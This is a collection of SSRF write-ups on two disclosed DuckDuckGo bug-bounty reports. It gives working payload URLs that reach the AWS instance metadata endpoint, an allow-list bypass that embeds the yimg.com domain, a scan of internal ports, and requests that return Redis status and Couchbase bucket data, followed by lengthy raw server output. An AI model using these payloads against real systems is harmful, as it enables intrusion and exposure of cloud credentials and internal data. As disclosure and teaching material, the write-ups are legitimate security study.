SSRF Write-ups

DuckDuckGo - SSRF Access AWS Data

DuckDuckGo disclosed on HackerOne: SSRF vulnerability on...HackerOne

Researcher illustrated vulnerability on the URL:

https://proxy.duckduckgo.com/iur/?f=1&image_host=

The image_host URL Parameter is vulnerable to SSRF. AWS Metadata can be viewed at the URI http://169.254.169.254/latest/meta-data/. The following payload returned the AWS Metadata of the instance using the URI in the image_host URL parameter.

https://proxy.duckduckgo.com/iur/?f=1&image_host=http://169.254.169.254/latest/meta-data/

Server Response:

ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/```

Researcher illustrated using Curl

DuckDuckGo - SSRF & XSPA. Access to Redis and Couchbase db

DuckDuckGo disclosed on HackerOne: SSRF on duckduckgo.com/iu/HackerOne

Researcher discovered SSRF on the u URL parameter on endpoint https://duckduckgo.com/iu?u= . The URL parameter originally contained http://yimg.com/ . Anytime you see a URL used in a parameter like that it is a good indication that the parameter might be vulnerable to SSRF.

Original Request:

Original request returns HTTP 200

Changing URL parameter to https://google.com/ it gets rejected and returns HTTP 403 Forbidden.

HTTP 403 returned

Researcher discovered the URL parameter needs to contain the original yimg.com domain somewhere in the parameter. Adding that domain to the url parameter of an attacker controlled domain successfully bypasses this allow-list check and executes SSRF. In the image below the researcher used the yimg.com domain in a URL parameter q for the burp suite collaborator domain. In the Burp Collaborator Client the application can be seen reaching out over HTTP and DNS to query the attacker controlled domain.

SSRF Executed on burpcollaborator subdomain

Researcher also used this to perform XSPA and port scan internal services. Services are running on the following ports:

22
25
80
443
587
6380
6432
6767
6868
8000

Returning Redis information with the payload:https://duckduckgo.com/iu/?u=http://127.0.0.1:6868%2fstatus%2f?q=http://yimg.com/

{
  "current_time": "2018-08-23T17:56:06",
  "deployment_environment": "prod",
  "redis_local_last_successful_ping": "2018-08-23T13:56:05",
  "redis_local_url": "redis://127.0.0.1:6380",
  "redis_regional_last_successful_ping": "2018-08-23T13:56:05",
  "redis_regional_url": "redis://cache-services.duckduckgo.com:6380",
  "stat_blocked_ips_removed_since_launch": 8787,
  "stat_blocked_ips_since_launch": 12185,
  "stat_ipset_blocks": 266,
  "stat_redis_local_messages_received": 3613,
  "stat_redis_regional_messages_received": 10211,
  "status": "up"
}

Couchbase database access: https://duckduckgo.com/iu/?u=http://cache-services.duckduckgo.com:8091/pools/default/buckets?q=http://yimg.com/

[{"name":"botnet","bucketType":"memcached","authType":"none","saslPassword":"","proxyPort":11213,"replicaIndex":true,"uri":"/pools/default/buckets/botnet?bucket_uuid=573aed7706bb78f1884c01efd0f10911","streamingUri":"/pools/default/bucketsStreaming/botnet?bucket_uuid=573aed7706bb78f1884c01efd0f10911","localRandomKeyUri":"/pools/default/buckets/botnet/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/botnet/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/botnet/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/botnet/controller/startRecovery"},"nodes":[{"systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/botnet/stats","directoryURI":"/pools/default/buckets/botnet/statsDirectory","nodeStatsListURI":"/pools/default/buckets/botnet/nodes"},"ddocs":{"uri":"/pools/default/buckets/botnet/ddocs"},"nodeLocator":"ketama","autoCompactionSettings":false,"uuid":"573aed7706bb78f1884c01efd0f10911","replicaNumber":0,"threadsNumber":3,"quota":{"ram":273678336,"rawRAM":273678336},"basicStats":{"quotaPercentUsed":18.58643023903799,"opsPerSec":518,"hitRatio":0.6626984126984127,"itemCount":208856,"memUsed":50867033},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","nodesExt"]},{"name":"deep","bucketType":"memcached","authType":"none","saslPassword":"","proxyPort":11214,"replicaIndex":true,"uri":"/pools/default/buckets/deep?bucket_uuid=f95b42373da6bd8fdd51c93324229009","streamingUri":"/pools/default/bucketsStreaming/deep?bucket_uuid=f95b42373da6bd8fdd51c93324229009","localRandomKeyUri":"/pools/default/buckets/deep/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/deep/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/deep/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/deep/controller/startRecovery"},"nodes":[{"systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/deep/stats","directoryURI":"/pools/default/buckets/deep/statsDirectory","nodeStatsListURI":"/pools/default/buckets/deep/nodes"},"ddocs":{"uri":"/pools/default/buckets/deep/ddocs"},"nodeLocator":"ketama","autoCompactionSettings":false,"uuid":"f95b42373da6bd8fdd51c93324229009","replicaNumber":0,"threadsNumber":3,"quota":{"ram":4116709376,"rawRAM":4116709376},"basicStats":{"quotaPercentUsed":80.05820960337813,"opsPerSec":194,"hitRatio":0.08633093525179857,"itemCount":2326851,"memUsed":3295763821},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","nodesExt"]},{"name":"services","bucketType":"membase","authType":"none","saslPassword":"","proxyPort":11212,"replicaIndex":false,"uri":"/pools/default/buckets/services?bucket_uuid=06787b1d4c84027860a5f73efb508bff","streamingUri":"/pools/default/bucketsStreaming/services?bucket_uuid=06787b1d4c84027860a5f73efb508bff","localRandomKeyUri":"/pools/default/buckets/services/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/services/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/services/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/services/controller/startRecovery"},"nodes":[{"couchApiBase":"http://10.0.1.188:8092/services%2B06787b1d4c84027860a5f73efb508bff","systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/services/stats","directoryURI":"/pools/default/buckets/services/statsDirectory","nodeStatsListURI":"/pools/default/buckets/services/nodes"},"ddocs":{"uri":"/pools/default/buckets/services/ddocs"},"nodeLocator":"vbucket","autoCompactionSettings":false,"uuid":"06787b1d4c84027860a5f73efb508bff","vBucketServerMap":{"hashAlgorithm":"CRC","numReplicas":0,"serverList":["10.0.1.188:11210"],"vBucketMap":[[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0]]},"replicaNumber":0,"threadsNumber":3,"quota":{"ram":14271119360,"rawRAM":14271119360},"basicStats":{"quotaPercentUsed":84.70888041118592,"opsPerSec":533,"diskFetches":26,"itemCount":39777489,"diskUsed":235428957137,"dataUsed":135860040563,"memUsed":12088905432},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","touch","couchapi","cccp","xdcrCheckpointing","nodesExt","dcp"]}]```